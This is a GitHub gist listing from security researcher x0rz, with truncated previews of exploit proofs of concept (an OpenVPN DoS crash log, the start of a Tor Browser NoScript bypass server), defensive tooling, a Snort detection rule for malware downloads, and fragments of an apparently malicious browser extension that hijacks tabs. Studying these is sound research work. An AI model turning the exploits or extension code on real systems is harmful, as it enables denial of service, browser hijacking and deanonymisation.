Skip to content

Instantly share code, notes, and snippets.

View x0rz's full-sized avatar

x0rz

3.5k followers · 0 following
View GitHub Profile
@x0rz
x0rz / bulk_dns_check.py
Created May 2, 2017 12:11
# Usage: ./dns_check.py <list_of_domain_names.txt>
import dns.resolver
import requests
import re
import json
import sys
resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5
@x0rz
x0rz / dos_server.py
Created May 12, 2017 12:06
CVE-2017-7478: Proof of Concept Code for the OpenVPN Pre-Authentication DoS Vulnerability
#!/usr/bin/env python3
# Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf
"""
$ ./dos_server.py &
$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf
...
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf))
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask␣255.255.255.0
@x0rz
x0rz / TorBrowser_7.x_NoScript_bypass.py
Last active November 10, 2021 13:24
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
@x0rz
x0rz / fake_sandbox.ps1
Created April 14, 2016 13:56
# Simulate fake processes of analysis sandbox/VM that some malware will try to evade
# This just spawn ping.exe with different names (wireshark.exe, vboxtray.exe, ...)
# It's just a PoC and it's ugly as f*ck but hey, if it works...
# Usage: .\fake_sandbox.ps1 -action {start,stop}
param([Parameter(Mandatory=$true)][string]$action)
$fakeProcesses = @("wireshark.exe", "vmacthlp.exe", "VBoxService.exe",
"VBoxTray.exe", "procmon.exe", "ollydbg.exe", "vmware-tray.exe",
@x0rz
x0rz / detect_fresh_pe.py
Created July 20, 2016 12:38
import datetime
import os
import sys
import pefile
from scapy.all import *
import scapy_http.http
import tempfile
TIME_THRESHOLD = datetime.timedelta(days=3)
@x0rz
x0rz / signal commands.txt
Last active September 18, 2019 14:23
# Registering your new number
signal-cli -u "+1234568790" register
signal-cli -u "+1234568790" verify xxxxxx
@x0rz
x0rz / eqgrp_services_lookup.ps1
Created April 18, 2017 16:31
echo "[+] Getting \system\\currentcontrolset\\services"
$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name
$services = @()
foreach ($srv in $raw_services) {
$shortname = "$srv".Split("\")[-1]
$shortname = $shortname.Substring(0,$shortname.Length-1)
$services += $shortname
}
@x0rz
x0rz / wordpress_snort.rules
Last active September 29, 2017 05:56
Snort rule replacing sid:26576 to detect more second stage download attempts (may raise false positives - to be tested)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC possible infected wordpress second stage download attempt"; flow:to_server,established; http_uri; pcre:"/\/wp-(includes|admin|content)\/.*\.(exe|dll|scr|rar|zip|jar|ps1|bat)/iU";metadata:service http; reference:url,medium.com/@x0rz/threat-hunting-on-simple-tricks-27e64e39f2f0; classtype:trojan-activity; sid:31337; rev:1;)
@x0rz
x0rz / manifest.json
Created September 18, 2017 08:03
{
"background": {
"scripts": [ "background.js" ]
},
"browser_action": {
"default_icon": "opurie.png",
"default_popup": "popup.html",
"default_title": "Opurie"
},
"description": "Whiohoo! Welcome back to Opurie",
@x0rz
x0rz / background_beautify.js
Created September 18, 2017 08:01
function redirect(e) {
chrome.tabs.update({
url: e
})
}
var pagebrowsed, allowSearch, prevurl = null,
srchid = 100,
sysid = 739,
random = Math.floor(1e7 * Math.random()),
thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],